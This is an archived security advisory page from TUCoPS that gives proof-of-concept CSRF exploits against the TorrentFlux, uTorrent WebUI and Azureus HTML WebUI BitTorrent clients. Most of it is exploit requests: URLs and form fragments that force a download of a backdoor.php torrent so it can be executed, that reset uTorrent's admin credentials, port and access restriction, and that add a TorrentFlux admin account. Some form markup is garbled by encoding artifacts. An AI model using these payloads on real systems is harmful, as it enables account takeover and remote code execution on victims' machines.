TUCoPS :: HP Unsorted B :: bx2867.htm

BitTorrent Clients and CSRF
BitTorrent Clients and CSRF
BitTorrent Clients and CSRF


The following are proof of concept exploits against three bittorrent clients.  uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.


">action="http://localhost/torrentflux_2.3/html/index.php">
">value="http://localhost/backdoor.php.torrent">






Add an admistrative account:
action==94http://localhost/torrentflux_2.3/html/admin.php?op=addUser=94>










uTorrent=92s WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azurues=92s HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH